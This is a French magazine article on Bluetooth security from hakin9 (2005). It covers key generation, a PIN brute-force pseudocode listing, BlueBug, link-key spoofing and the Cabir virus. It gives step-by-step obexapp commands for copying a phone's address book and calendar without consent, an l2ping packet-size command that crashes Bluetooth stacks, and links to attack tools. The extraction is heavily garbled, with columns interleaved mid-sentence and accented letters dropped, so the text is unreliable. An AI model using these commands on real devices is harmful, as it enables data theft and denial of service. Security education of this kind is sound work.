La porte de la communication Bluetooth est de moins de 10 jusqu'au plus de
100 mtres (en fonction de la puissance de l'metteur et du rcepteur). La plupart Comme nous l'avions dit, le
des priphriques sont munis d'une antenne de faible puissance le cot d'un tel deuxime niveau de protection est
priphrique est moins lev, la consommation d'nergie est galement plus faible ralis par le chiffrage des donnes
(ce qui est important, tant donn que ces priphriques sont aliments avec des envoyes. Pour cela, on utilise la
batteries). Cela signifie qu'un coutant devra se trouver une distance de quelques cl de chiffrage d'une longueur de
mtres. Pourtant, malgr les apparences, ce n'est pas une difficult il y a plusieurs 8128 bits, gnre l'aide de l'al-
endroits o l'on peut effectuer une attaque sans tre vu, tout en se trouvant trs gorithme E0. Cette taille dpend de
prs du priphrique attaqu. L'exemple le plus banal est le hall d'arrives d'un plusieurs facteurs entre autres, de
aroport.
la puissance de calcul du priphri-
que concern et de la lgislation du
pays d'origine. tant donn que dans
niveau 3 la protection au niveau entrantes ne sont effectues sans la communication peuvent participer
de la connexion rseau. parler du chiffrage des donnes des priphriques utilisant des cls
envoyes. Ce chiffrage est parfois de longueurs diffrentes, lors de
La plupart des priphriques sont effectu au niveau de l'application l'tablissement de la connexion chif-
configurs par dfaut de faon (2me niveau de protection). fre, elles ngocient la longueur de
fonctionner sans protection. Aucu- Mais Bluetooth permet d'effectuer la cl commune.
ne authentification (vrification de l'authentification et l'autorisation au ni- Le troisime niveau est ralis
l'identit) ni autorisation (dfinition veau de la connexion rseau il suffit travers la phase d'authentification
des droits d'accs) des connexions de configurer le priphrique de faon et d'autorisation. Son composant le
ce que celui-ci demande l'authenti- plus important est la cl de liaison.
fication, l'autorisation et le chiffrage Cette cl est utilise toujours quand
propos de l'auteur pour les connexions entrantes et en- il faut protger une connexion r-
Tomasz Rybicki est membre
voie lui-mme ces informations lors seau indpendamment du nombre
du MEAG (Mobile and Embed-
de l'initialisation d'une connexion. de priphriques participant la
ded Applications Group http://
Dans chaque priphrique utili- communication. La cl de liaison est
meag.tele.pw.edu.pl), l'quipe agis-
sant au sein de l'Institut de Tlcom- sant la technologie Bluetooth, cinq un nombre pseudo-alatoire, d'une
munication de l'cole Polytechnique lments assurant la scurit des longueur de 128 bits. Elle peut tre
de Varsovie. Il s'occupe des applica- connexions sont disponibles. Ces temporaire valide jusqu' la fin de
tions mobiles fonctionnant en tech- lments sont utiliss pour la gn- la session courante, ou permanente
nologie J2ME. Contact de l'auteur : ration des cls et l'implmentation du aprs la terminaison de la ses-
trybicki@autograf.pl. chiffrage au deuxime et troisime sion, elle peut tre exploite pour
niveau de protection : des authentifications ultrieures

hakin9 N o 4/2005 www.hakin9.org 13

 des priphriques qui ont parti-
cip la transmission termine. En
fonction de l'application, du nombre
de priphriques prenant part la
communication et du type de cette
dernire, la cl de liaison est gn-
re de faons diffrentes :
La cl de liaison peut constituer
la cl du priphrique. La cl du
priphrique est une cl gnre
l'aide de l'algorithme E21 lors
de la premire mise en marche
du priphrique. Elle est stocke
dans la mmoire non volatile et
rarement change. Pendant l'ini-
tialisation de la connexion, c'est
l'application en cours qui dcide
quelle cl doit tre utilise.
La cl de liaison peut tre une cl
combine, gnre partir des algorithme les autres sont envoys
informations provenant des pri-
phriques en communication. La
cl combine est cre pour une
paire de priphriques. Chaque
priphrique gnre un nombre
pseudo-alatoire, et ce nombre,
avec l'adresse du priphrique,
est utilise pour gnrer con-
formment l'algorithme E21
la cl partielle. Les deux cls
partielles sont changes entre
les priphriques et partir de
celles-ci, les priphriques cal-
culent la cl combine.
En cas de communication en-
tre plusieurs priphriques, on
utilise la cl principale. Elle est
gnre par un priphrique nre (en tirant au sort) un nombre
jouant le rle du serveur. Ce
priphrique cre deux nom-
bres pseudo-alatoires de 128
bits. partir de ceux-ci, par le
biais de l'algorithme E22, la cl
principale est gnre. Ensuite,
le serveur gnre le troisime
nombre pseudo-alatoire qui est
envoy au client. partir de ce
Dossier
nombre et de la cl actuelle, la
cl de transmission est cre. Le
serveur cre une cl tant une
transformation XOR de la cl
principale et de transmission et
l'envoie au client, qui partir ce
celle-ci, calcule la cl principale.
Dans le cas de priphriques
qui ne communiquaient pas
14
jusqu'alors, la cl d'initialisation
est utilise. Cette cl est cre
partir des codes PIN saisis
dans les deux priphriques,
de l'adresse du priphrique
initialisant la communication
et du nombre pseudo-alatoire
de 128 bits gnr par le pri-
phrique recevant la communi-
cation (algorithme E22). La cl
cre de la sorte est utilise
pour transmettre la cl de liaison
et est ensuite supprime.
l'attaque !
La premier dfaut essentiel du
modle de protection admis est
l'algorithme E22. Pour calculer la
cl, il utilise le code PIN. Ce code
est le seul composant secret de cet
entre les priphriques sous forme
claire.
Attaque sur E22
Voyons un peu la phase d'initialisa-
tion de la connexion entre deux p-
riphriques qui ne communiquaient
jamais jusqu'alors. Admettons que le
priphrique B initialise la connexion
avec le priphrique A. Les phases
successives de l'tablissement d'une
connexion sont illustres sur la Fi-
gure 1.
Tout d'abord, le priphrique A,
en rponse la demande d'ta-
blissement d'une communication
envoye par le priphrique B, g-
pseudo-alatoire RAND (l'abrvia-
tion du mot anglais random). Ce
nombre est envoy en texte clair
vers le priphrique B. partir de
ce nombre, des codes PIN saisis
et de leurs longueurs, le nombre K
est gnr (il n'est jamais envoy
entre les priphriques). Ensuite,
les deux priphriques gnrent
deux nombres alatoires, RANDA
et RAND B, et les renvoient rcipro-
quement l'un l'autre (chiffrs sous
forme d'une disjonction exclusive
avec le nombre K).
Ensuite, connaissant leurs
adresses et leurs propres nombres
alatoires (RANDA et RAND B),
les priphriques gnrent la
www.hakin9.org
Bluetooth
et algorithmes E
Pour la gnration de la cl, Bluetooth
utilise quelques algorithmes. Les plus
importants sont E0, E21 et E22.
E0 est un algorithme de chiffrage
utilisant quatre registres indpen-
dants avec LFSR (Linear Feedback
Shift Registers) et un automate fini
servant introduire un certain niveau
de non-linarit, de faon empcher
le calcul de l'tat des registres partir
des observations de leurs donnes
de sortie.
E21 est un algorithme de gnra-
tion de la cl d'un priphrique, cr
partir de l'algorithme SAFER+. E22
est aussi une modification de l'algo-
rithme SAFER+ et ressemble trs fort
E21 il est utilis pour gnrer la
cl de la connexion. Par contre, E3
est un algorithme de chiffrage de
donnes.
Ces algorithmes sont prsents
avec dtails dans la spcification du
Bluetooth (https://www.bluetooth.org/
spec/).
cl de liaison LK AB. Cette cl,
avec le nombre pseudo-alatoire
CH_RANDA gnr par le priph-
rique A, est utilise pour calculer
le nombre SRES. Le priphrique
A accepte la connexion de la part
du priphrique B seulement si la
valeur retourne par le priphri-
que B, gnre partir du nombre
CH_RANDA envoy auparavant,
est gale la valeur calcule dans
le priphrique A. Cette dernire
tape peut tre inverse le pri-
phrique B peut de la mme faon
(en envoyant le nombre CH_RAN-
D B et en comparant le rsultat
renvoy avec leurs propres calculs)
vrifier le priphrique A.
Les objectifs de l'attaque sont les
suivants le code PIN, la cl K utili-
se pour la gnration de la cl de
liaison LK, et enfin, la cl de liaison
en tant que telle (elle est utilise ul-
trieurement pour la gnration de la
cl de chiffrage).
Si l'on fait un petit effort, on peut
intercepter les nombres RAND, CA,
CB, CH_RAND, SRESB. Pour ce faire,
la synchronisation avec l'algorithme
hakin9 N o 4/2005
 Scurit du Bluetooth

de saut de frquence (frequency

hopping) utilis dans le Bluetooth
est exige, mais ce n'est pas facile.
Une autre faon consiste enregis-
trer le spectre de frquence entier
et effectuer l'analyse et les calculs
offline. Les deux faons ncessitent
de l'quipement particulier (voire
trs cher : un enregistreur du spec-
tre cote quelques milliers d'euros)
et elles sont plutt inaccessibles un
simple mortel.
Mais admettons que les donnes
du priphrique attaqu soient si
importantes que les cots de l'qui-
pement ne compte pas. Aprs avoir
enregistr et analys le spectre,
Listing 1. Le script calculant les valeurs SRES pour les valeurs
successives des numros PIN
PIN=-1;
do
{
PIN++;
CR_K = E22(RAND, PIN, length(PIN));
CR_RANDA = CA xor CR_K;
CR_RANDB = CB xor CR_K;
CR_LKA= E21(CR_RANDA, ADDRA);
CR_LKB= E21(CR_RANDB, ADDRB);
CR_LKAB = CR_LKA xor CR_LKB;
CR_SRES = (CH_RAND, ADDRB, CR_LKAB);

nous obtenons les nombres RAND,

CA, CB, CH_RAND et SRESB.
Comment alors dterminer le PIN,
K et K AB ? L'algorithme consiste
calculer les valeurs SRES pour
les valeurs successives du numro
PIN c'est une attaque par force
brutale (brute force). Le script cal-
culant ces valeurs est prsent dans
le Listing 1. Aprs la terminaison de
son fonctionnement, nous savons
} while (CR_SRES == SRES)
que CR_SRES=SRES, et de cela
CR_LK A=LK A, CR_LKB =LKB, par
contre CR_K=K.
Cette solution ncessite un
grand nombre de calculs et en cela,
cette attaque est plutt de type
offline. Dans les tapes suivantes,
les numros successifs PIN sont
gnrs et les calculs sont effec-
tus. Cette mthode est assez
commode car le code PIN est g-
nralement court (qui aurait envie
de taper un nombre de dix chiffres,
sans parler de le mmoriser). De
plus, trs souvent, il a par dfaut
la valeur 0000. Dans ce cas,

Figure 1. Les phases successives de l'tablissement d'une connexion entre deux priphriques Bluetooth

hakin9 N o 4/2005 www.hakin9.org 15


Figure 2. La recherche des adresses des priphriques Bluetooth
il n'est pas ncessaire d'effectuer
les cycles de calculs.
Un avantage supplmentaire
de cette attaque est la possibilit
d'ajouter aux informations poss-
des, les donnes sur la cl de
chiffrage. Pour la gnrer, on uti-
lise la cl de liaison actuelle LK,
et le nombre pseudo-alatoire est
envoy (de nouveau) entre les p-
riphriques de faon non chiffre.
Si vous connaissez la cl de liaison
(attaque sur E22) et le nombre
pseudo-alatoire, il est facile de
calculer la cl de chiffrage.
Attaque sur le PIN (en ligne)
Dans certaines situations, il est pos-
sible de se procurer le numro PIN
en ligne. Certains priphriques pos-
sde un code PIN fixe contre les
attaques, il est protg seulement
par le temps exponentiel entre les
tentatives d'authentification succes-
sives. Ce type de protection peut
tre facilement contourn il suffit,
Dossier
aprs chaque tentative d'authentifi-
cation non russie (et le code PIN
incorrect), de changer l'adresse du
priphrique. Dans le cas d'un tl- de prendre connaissance de la cl
phone ou PDA, cette opration sera
plutt difficile, mais un ordinateur
portable muni d'une carte Bluetooth
offre de grandes possibilits de s'in-
troduire dans la pile Bluetooth.
16
Dissimulation
Une autre mthode d'attaque est
l'utilisation de la cl du priphrique.
Envisageons le scnario suivant
les priphriques A et B commu-
niquent entre eux l'aide de la cl
du priphrique A. Aprs un certain
temps, le priphrique A se connec-
te avec le priphrique C, en utili-
sant aussi la cl du priphrique A.
Le priphrique B, possdant la
cl du priphrique A, peut sans
problme couter la transmission,
ou mme se faire passer pour le
priphrique C.
En pratique, une telle attaque
peut tre effectue l'aide d'un
ordinateur portable dot de la carte
Bluetooth. Lors de l'tablissement
de la connexion, les deux priphri-
ques participant la communication
ngocient la cl de liaison qui sera
utilise. En modifiant la structure de
la pile des protocoles, il est possible
d'imposer que le priphrique atta-
quant (ordinateur portable) demande
chaque fois l'utilisation de la cl du
priphrique attaqu. Ainsi, l'as-
saillant (priphrique B) est capable
du priphrique attaqu (priphri-
que A).
Une fois la connexion termine,
le priphrique B effectue l'coute
au moment o il enregistre l'adresse
www.hakin9.org
du priphrique A (il le connat dj
parce qu'il s'est dj connect au p-
riphrique A) envoye par le priph-
rique C pour appeler le priphrique
A, commence suivre la connexion
entre ces deux priphriques. Si la
cl du priphrique A est l'unique
cl de liaison entre A et C, le pri-
phrique B sera capable d'couter la
transmission.
Dtecter l'indtectable
Pour tablir une connexion rseau
l'aide du Bluetooth, l'adresse (URL)
du priphrique cible est ncessaire.
Pour obtenir les adresses de tous les
priphriques qui se trouvent proxi-
mit, il faut effectuer la recherche.
Cette opration consiste envoyer par
le priphrique un message appropri
l'adresse broadcast. Les priphri-
ques fonctionnant en mode dtecta-
ble coutent ces types de messages
et y ragissent par l'envoi d'un court
message contenant, entre autres,
leurs adresses. Les priphriques qui
sont en mode indtectable ngligent
ces messages et leurs adresses ne
sont pas rendues publiques.
Ce processus est prsent sur la
Figure 2. Le priphrique A recher-
che les priphriques se trouvant
proximit ; la couleur bleu signifie
que le priphrique trouv est en
mode dtectable, rouge en mode
indtectable. Comme vous voyez,
tous les priphriques reoivent le
message de requte (en anglais
inquiry), mais seuls les priphri-
ques en mode dtectable rpon-
dent (c'est--dire les priphriques
B et C). Le priphrique D nglige le
message de requte.
On peut avoir l'impression qu'il est
impossible d'tablir une connexion
entre les priphriques fonctionnant
en mode indtectable. Mais ce n'est
pas vrai. Le priphrique en mode
indtectable nglige les messages de
requte, mais rpond aux messages
adresss directement lui.
Mais comment l'assaillant peut
connatre l'adresse d'un priphrique
d'une longueur de 48 bits ? Il peut,
par exemple, la gnrer. Et il n'a
pas besoin de 248 -1 combinaisons,
comme on pourrait supposer.
hakin9 N o 4/2005
 Scurit du Bluetooth

L'adresse d'un priphrique Blue-

Bluetooth sur la pile tooth est unique l'chelle mondiale
Chaque priphrique utilisant l'interface Bluetooth, autant un tlphone mobile et se compose de trois parties :
qu'un ordinateur personnel, possde une pile de protocoles Bluetooth. Cette pile
est prsente sur la Figure 3 ; elle se compose des couches suivantes : le champ LAP (Lower Address
Part) de 24 bits,
Bluetooth Radio et Bluetooth Baseband Link rpondent de l'mission des ondes
le champ UAP (Upper Address
radio,
Part) de 8 bits,
la couche Link Manager est responsable de l'tablissement de la connexion en-
le champ NAP (Non-significant
tre les priphriques, ainsi que de sa scurit et de la surveillance du transfert
des paquets, Address Part) de 16 bits.
Host Controller Interface constitue une interface aux couches infrieures du
systme, indpendante de la plate-forme matrielle, Le champ LAP contient l'identifiant
Logical Link Control and Application Protocol rpond de la transmission des du producteur, affect globalement.
donnes en mode de connexion (division des messages en paquets, QoS, Les champs UAP et NAP sont
etc.), gnrs par le producteur du pri-
Service Discovery Protocol donne accs aux services du niveau lev, lis phrique. Cela signifie qu'il y a uni-
la recherche des priphriques qui se trouvent proximit et la dtection quement 224 -1 possibilits (environ
des services offertes par ceux-ci,
16 millions combinaisons).
RFCOMM (Serial Emulation API) permet d'muler les connexions cble ainsi,
Pour dtecter tous les priph-
sur les priphriques dot du Bluetooth il est possible de lancer les applications
riques qui se trouvent proximit
utilisant le port srie pour se connecter,
OBEX, c'est--dire Object Exchange API permet d'changer des objets tels (y compris ceux qui sont en mode
que cartes de visite lectroniques ou notes dans l'agenda, envoys au format indtectable), il suffit de concevoir
vCard (vCalendar). Il est prsent dans les tlphones dots de l'interface IrDA un programme gnrant les adres-
(faisceaux infrarouges). ses successives et envoyant le mes-
sage qui appellera chacun d'eux.
Un lment supplmentaire qui doit tre disponible sur chaque priphrique Blue- Pour acclrer le fonctionnement
tooth est BCC, c'est--dire Bluetooth Control Center. BCC est un centre de comman-
du programme, on peut effecteur
de du module Bluetooth. Il permet, entre autres, d'activer ou de dsactiver le mode
des calculs simultans, en plusieurs
dtectable ou indtectable sur un priphrique, et mme de dsactiver compltement
trames.
le module Bluetooth.
La spcification du Bluetooth ne dtermine pas la faon d'implmenter le BCC Le code source du programme
cela peut tre ralis en tant qu'une position du menu du systme d'exploitation RedFang, permettant de dtecter
dans le tlphone cellulaire, en tant qu'API disponible partir du niveau du pro- les priphriques dont la fonction
gramme excut sur un priphrique ou sous forme de paramtres fixes (dans le non dtectable a t acti-
cas des priphriques, pas trop bien avancs). ve, est disponible l'adresse
http://www.securiteam.com/tools/
5JP0I1FAAE.html. Le scannage
complet du milieu, dans le cas de
la plage d'adresses d'un fabricant
(l'itration uniquement suivant UAP
et NAP), dure environ 90 minutes.

Scannage des ports

Un priphrique fonctionnant en
mode serveur donne accs cer-
tains services. Ces services sont dif-
fuss, c'est--dire, les associations
entre les services concrets (noms) et
les numros des ports sur lesquels
ils sont disponibles, sont cres
(la couche SDP, c'est--dire Service
Discovery Protocol de la pile Blue-
tooth cf. l'Encadr Bluetooth sur la
pile). Le client, en se connectant un
service (identifi d'aprs le nom), en
ralit se connecte un port concret
du priphrique fonctionnant en tant
Figure 3. La pile de protocoles Bluetooth que serveur.

hakin9 N o 4/2005 www.hakin9.org 17

 videmment, pas tous les servi-
ces disponibles dans un priphri-
que doivent tre diffuss. Un simple
exemple l'utilisateur tlcharge
partir d'Internet un gratuiciel de
type PIM (Personal Information Ma-
nager) permettant, l'aide du Blue-
tooth, de planifier des rencontres
ou d'changer des cartes de visite.
Le programme diffuse le service
offert sur l'un des ports du priph-
rique. Mais il a une porte drobe
(backdoor) sur un autre port, non
diffus, il donne accs toutes les
donnes de l'utilisateur. Vu que ce
service n'est pas diffus, seuls les
priphriques mis dans le secret
y ont accs.
Pour vrifier quels services
fonctionnent sur les ports spci-
fiques du priphrique, on peut
utiliser un scanneur de ports
par exemple le programme
bt_audit disponible l'adresse
http://www.betaversion.net/btdsd/
download/bt_audit-0.1.tar.gz. Pour
plus de dtails sur l'espionnage
des priphriques Bluetooth, rf-
rez-vous l'Encadr Outils pour les
intresss.
BlueBug
BlueBug est une erreur d'impl-
mentation de la pile Bluetooth se
produisant sur certains priph-
riques disponibles sur le march.
Cette erreur permet d'tablir une
connexion non autorise PPP avec
un priphrique, et ensuite, de lui
donner des commandes l'aide d'AT
(cf. l'Encadr Commandes AT).
Dans la pratique, cela signifie
qu'il est possible de prendre le
contrle total du priphrique. Le
pirate a accs non seulement aux
donnes enregistres dans le pri-
phriques (SMS, carnet d'adresses,
etc.), mais aussi il peut commencer
Dossier
employer ce priphrique : ini-
tialiser les connexions sonores ou
envoyer des messages SMS. Ce
type d'attaque est plus puissant
que cela pourrait paratre les
pertes des donnes ou les pertes
financires (p. ex. l'initialisation des
connexions avec les numros de ty-
pe premium) ne sont que le prlude
18
Outils pour les intresss
Il existe des outils qui ne servent pas attaquer directement les priphriques, mais
qui sont employs collecter les informations sans laisser la moindre trace du proces-
sus d'espionnage. Ces outils ne doivent pas tre ncessairement utiliss des fins
malicieuses vous pouvez les employer pour estimer le niveau de protection de vos
propres priphriques.
L'un de ces programmes est Bluetooth Scanner. Il permet d'obtenir un grand
nombre d'informations sur le priphrique sans avoir tablir une connexion per-
manente (l'change des cls, etc.). Le programme fonctionne sous Linux et il n-
cessite la prsence de la pile Bluetooth (BlueZ). Il est disponible l'adresse http://
www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads&section=01_bluetooth.
Un autre outil trs intressant est BlueAlert tournant sous Windows. Il permet
de surveiller le milieu du point de vue de la prsence des priphriques Bluetooth.
Aprs l'installation, la barre d'outils contient une icne informant l'utilisateur sur
les priphriques dots du Bluetooth qui sont disponibles proximit. Le pro-
gramme est tlcharger l'adresse http://www.tdksystems.com/software/apps/
content.asp?id=4.
de plus srieuses actions. En (et plus prcisment, pseudosrie,
envoyant un message SMS partir c'est--dire RFCOMM cf. l'En-
d'un tlphone mobile Bluetooth cadr Bluetooth sur la pile) et de
attaqu, l'assaillant peut connatre donner les commandes AT en texte
son numro, et l'initialisation d'une clair (cf. l'Encadr Commandes
connexion sonore permet d'couter AT). Si le priphrique n'est pas
son propritaire. Il est aussi pos- protg, aucune authentification
sible de reprer le priphrique n'est exige.
les oprateurs offrent dj ce ser- Comment savoir si un priphrique
vice, et trs souvent, pour l'activer, est vulnrable l'attaque BlueBug ?
il suffit d'envoyer un message SMS On peut utiliser un sniffeur de Blue-
un numro donn. Parmi les tl- tooth, par exemple http://trifinite.org/
phones vulnrables cette attaque trifinite_stuff_blooover.html. Il fonc-
il faut noter les appareils tels que tionne en tant qu'application J2ME,
Nokia 6310, 6310i, 8910, 8910i ce qui veut dire qu'on peut le dmarrer
et Ericsson T610. sur chaque priphrique dot de Java
Pour effectuer ce type d'attaque, et Bluetooth.
il suffit d'ouvrir la connexion socket Le programme (le code source en
sur le port srie du priphrique C) qui s'attaque au priphrique par
Commandes AT
Les commandes AT ont t conues par l'entreprise Hayes Microcomputer Products
en vu de raliser les connexions avec les modems produits par cette entreprise.
prsent, le jeu de commandes AT dpend du type de modem (bien qu'il existe un jeu
de commandes de base pour les informations plus dtailles, il faut se rfrer la
documentation ou au site du fabricant d'un priphrique).
Toutes les commandes commencent par les lettres AT (de l'anglais attention), d'o
elles prennent leur nom. Elles permettent de commander et de diagnostiquer le mo-
dem. Dans Linux, cette opration s'est fait par l'envoi des commandes (en mode texte)
vers le port sur lequel le modem coute. Dans Windows, vous pouvez les envoyer soit
travers l'HyperTerminal, soit l'aide de l'onglet Diagnostic (Diagnostics) dans les
proprits du modem dans le panneau de configuration.
Les exemples des commandes AT :
ATA indique au modem qu'il doit rpondre l'appel,
ATDn indique au modem de composer le numro n,
ATLn volume du haut-parleur interne du modem (n=0 volume faible, n=3 volume
lev).
www.hakin9.org hakin9 N o 4/2005

l'intermdiaire de BlueBug se trouve
l'adresse http://www.saftware.de/
bluetooth/btxml.c. Le programme
tourne sous Linux et utilise son im-
plmentation de la pile Bluetooth,
BlueZ. Cette application permet,
entre autres, de copier le carnet
d'adresses partir d'un priphrique
distant, et cela sans aucune authen-
tification. Bluesnarfer, disponible
l'adresse http://www.alighieri.org/
tools/bluesnarfer.tar.gz fonctionne
de faon similaire.
Bluejacking
L'une des couches de la pile de
protocoles Bluetooth est la couche
OBEX (cf. l'Encadr Bluetooth sur
la pile), prsente aussi dans les
tlphones possdant l'interface
IrDA. OBEX permet d'envoyer des
paquets anonymement (c'est--dire
sans authentification), sans devoir
tablir une connexion (l'change de
cl) entre les priphriques. L'cran
du priphrique attaqu affiche une
inscription de type :
'You have been bluejacked'
received by Bluetooth
C'est un message informant qu'on
a obtenu l'objet appel You have
been bluejacked. Cet objet peut tre
une carte de visite ordinaire l'envoi
des cartes de visite est une fonc-
tion standard offerte par plusieurs
priphriques. l'adresse http://
www.mulliner.org/palm/bluespam.
php, vous trouverez un programme
(pour le systme PalmOS) permet-
tant de dtecter et d'attaquer de la
sorte les priphriques proximit.
Heureusement, Bluejacking n'est pas
dangereux pour les donnes stoc-
kes dans le priphrique.
Certaines implmentations
d'OBEX permettent aussi d'inter-
cepter des fichiers de manire non
autorise. vrai dire, il n'est pas trop
difficile d'effectuer ce type d'attaque.
Pour s'attaquer au Ericsson T610, on
utilisera FreeBSD. Aprs l'installation
d'une carte approprie et l'initialisa-
tion (en noyau ou en module) de la
pile Bluetooth, FreeBSD donne accs
quelques outils trs intressants :
hakin9 N o 4/2005
hccontrol sert, entre autres,
dtecter les priphriques se
trouvant dans le voisinage,
l2control affiche la liste des
connexions tablies,
l2ping fonctionne de faon ana-
logue au programme ping.
Ces utilitaires permettent de col-
lecter les informations sur les
priphriques dots de Bluetooth
qui se trouvent proximit. Mais
pour attaquer un tlphone, nous
nous servirons d'un autre outil
obexapp, disponible l'adresse
http://www.geocities.com /m_ev-
menkin. Cet outil sera utilis pour
charger des fichiers partir d'un
tlphone, l'insu et sans accord
du propritaire.
Dans la premire tape, il faut
initialiser la connexion OBEX (cf.
l'Encadr Bluetooth sur la pile) en
tapant la commande :
# obexapp -a BD_ADDR -f-C 10
BD _ ADDR est l'adresse du priphri-
que avec lequel vous voulez vous
connecter (pour le connatre, vous
pouvez utiliser le programme men-
tionn hccontrol). Le drapeau -f
indique au priphrique que l'on veut
se connecter au service de consulta-
tion des dossiers. Par contre l'option
-C 10 dfinit que l'on veut se connec-
ter au service OBEX PUSH, permet-
tant d'envoyer et de tlcharger les
fichiers partir du priphrique.
Ainsi, vous avez accs la ligne
de commandes de la connexion
OBEX :
obex>
Ensuite, vous commencez la ses-
sion de tlchargement des fichiers
partir du tlphone :
obex>get
et vous entrez le nom du fichier t-
lcharger :
get: remote file
(empty for default vCard)>
nom_du_fichier
www.hakin9.org
Scurit du Bluetooth
Dans la dernire tape, vous saisis-
sez le nom sous lequel vous voulez
enregistrer le fichier :
get: local file > nom_du_fichier
Une fois le tlchargement termin,
le message suivant s'affiche :
Success, response:
OK, Success (0x20)
Ainsi, vous avez accs tous les
fichiers du priphrique. Les plus
intressants sont :
telecom/pb.vcf, contenant le car-
net d'adresses,
telecom/pb/luid/*.vcf les fi-
chiers de cartes de visites enre-
gistrs dans le priphrique,
telecom/cal.vcs, contenant
l'agenda et le gestionnaire de
tches.
Les noms de tous les fichiers que
l'on peut tlcharger sont disponibles
sur les pages man de la commande
obexapp. Pour pouvoir accder aux
donnes dsires, il suffit d'ouvrir
le fichier tlcharg dans un diteur
quelconque.
Attaque Denial of Service
Certaines implmentations de la
pile Bluetooth sont vulnrables aux
attaques de type DoS (Denial of
Service). Cette attaque consiste
envoyer un paquet modifi au
priphrique. Ce paquet entrane le
plantage du fonctionnement de la
pile Bluetooth.
En quoi consiste la modification
du paquet ? Chose trange, il chan-
ge uniquement la taille du paquet
en suprieure 65536 octets. Ces
attaques peuvent tre effectues
l'aide des outils standards du pa-
quet Linux BlueZ il suffit de taper la
commande :
$ l2ping s <taille_du_paquet>
La faille permettant d'effectuer une
telle attaque rsulte des erreurs
dans l'implmentation de la pile
Bluetooth et c'est pourquoi, elle
19
 ne concerne que certains types
de priphriques. Ce sont, entre
autres les Nokia 6310(i), Nokia
6230, Nokia 6820, Nokia 7600
(le fabricant affirme que les pri-
phriques vendus prsent n'ont
plus ce dfaut).
Temps du vaccin
Depuis la fin de 2004, les virus
utilisant l'interface Bluetooth pour
se propager deviennent de plus en
plus populaires (cf. la rubrique En
abrg, hakin9 3/2005). Dernire-
ment, le virus Cabir (appel aussi
Caribe) tait trs frquent. Regar-
dons-le de prs.
Comment Cabir fonctionne
Cabir est diffus via le fichier appel
Caribe.sis tous les priphriques
qui se trouvent proximit et cou-
tent les radiomessages (paging).
Heureusement, cela signifie que
notre cellulaire est protg quand
il ne possde pas de Bluetooth,
ce module est dsactiv un mo-
ment donn ou il n'coute pas les
connexions provenant des autres
priphriques (l'option Discoverable
dans BCC). Cabir est diffus entre
les matriels agissant sous contrle
du systme Symbian.
Quand un priphrique conta-
min se connecte au notre, un mes-
sage similaire s'affiche :
Receive message via Bluetooth
from [device name]?
C'est la premire occasion de se pro-
tger contre l'infection. Si vous n'at-
tendez aucun message ou le nom
du priphrique est inconnu, il faut
rejeter cette connexion. Cependant,
si vous ne l'avez pas fait, le message
suivant apparat :
Dossier
Application is untrusted and
may have problems. Install only
if you trust provider.
Ce message est plus catgorique
et devra veiller nos soupons. Mais
il se peut que notre priphrique
attende une connexion et que ces ty-
pes de messages ne nous inquitent
20
pas. Si nous nous dcidons main- resse) des utilisateurs installant sans
tenant installer le programme rflchir les applications inconnues
envoy, le message qui s'affiche permet ce virus de se propager.
dissipe tous les doutes : Aprs l'installation, le virus cre
dans le systme les fichiers nu-
Install caribe? mrs dans le Listing 2. Ensuite,
il essaie de se diffuser dans tous les
Si vous rpondez positivement aussi priphriques muni du Bluetooth qui
cette question, le virus pourra tre se trouvent dans le voisinage (ind-
install. On voit donc que le systme pendamment de leur type).
d'avertissements est assez efficace, C'est justement la plus grande
et simplement la ngligence (ou la pa- menace la prsence du virus dans
Sur Internet
https://www.bluetooth.org/spec la spcification du Bluetooth,
http://trifinite.org/trifinite_stuff_bluebug.html BlueBug,
http://trifinite.org/trifinite_stuff_blooover.html Blooover,
http://www.securiteam.com/tools/5JP0I1FAAE.html le code source de Red-
Fang,
http://kennethhunt.com/archives/000786.html l'application RedFang,
http://www.astalavista.com/index.php?section=dir&cmd=file&id=2749 le front-
end pour RedFang,
http://bluesniff.shmoo.com le scanneur du Bluetooth,
http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads&section=01_blue-
tooth btscanner 1.0,
http://www.tdksystems.com/software/apps/content.asp?id=4 BlueAlert,
http://www.betaversion.net/btdsd/download/bt_audit-0.1.tar.gz le scanneur des
ports du Bluetooth,
http://sourceforge.net/projects/bluez BlueZ, la pile de protocoles Bluetooth pour
Linux,
http://www.saftware.de/bluetooth/btxml.c Bluetooth Phone Book Dumper (pour
BlueZ),
http://www.bluejackq.com/how-to-bluejack.shtml bluejacking,
http://www.mulliner.org/palm/bluespam.php BlueSpam,
http://www.alighieri.org/tools/bluesnarfer.tar.gz Bluesnarfer,
http://www.informit.com/articles/printerfriendly.asp?p=337071&rl=1 le code
source de Dust,
http://mobile.f-secure.com l'anti-virus pour Lasco,
http://www.f-secure.com/v-descs/lasco_a.shtml la description dtaille de
Lasco,
http://www.swedetrack.com/images/bluet11.htm frequency hopping,
http://www.giac.org/certified_professionals/practicals/gcia/0708.php l'attaque
sur le tlphone mobile Ericsson T610 partir de FreeBSD,
http://www.betaversion.net/btdsd/download/T610_address_dump_obexftp.txt
le rsultat du scannage des ports du tlphone Ericsson T610.
Glossaire
Authentification le processus consistant dterminer l'identit de l'expditeur
et du destinataire des messages.
Autorisation le processus consistant attribuer les droits d'accs un expditeur
ou un destinataire.
Bluejacking l'envoi des objets (par exemple des cartes de visite) vers un priph-
rique Bluetooth anonymement, sans devoir tablir la connexion.
Frequency hopping le changement de canal de communication fait 1600 fois par
seconde par les priphriques utilisant Bluetooth.
www.hakin9.org hakin9 N o 4/2005

Listing 2. Les fichiers crs dans le systme par le virus Cabir
C:\SYSTEM\APPS\CARIBE\CARIBE.APP
C:\SYSTEM\APPS\CARIBE\CARIBE.RSC
C:\SYSTEM\APPS\CARIBE\FLO.MDL
C::\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP
C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC
C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS
C:\SYSTEM\RECOGS\FLO.MDL
C:\SYSTEM\INSTALLS\CARIBE.SIS
le tlphone est le rsultat de la
ngligence, quand on ne lit pas les
avertissements mis par le systme
d'exploitation, mais dans les pri-
phriques sans interface graphique,
cela est la consquence d'un instant
d'inattention.
Le virus agissant dans un pri-
phrique recherche constamment
les matriels proximit et leur en-
voie son code. L'unique consquen-
ce de son fonctionnement est une
consommation leve de la batterie
et un trafic rseau important.
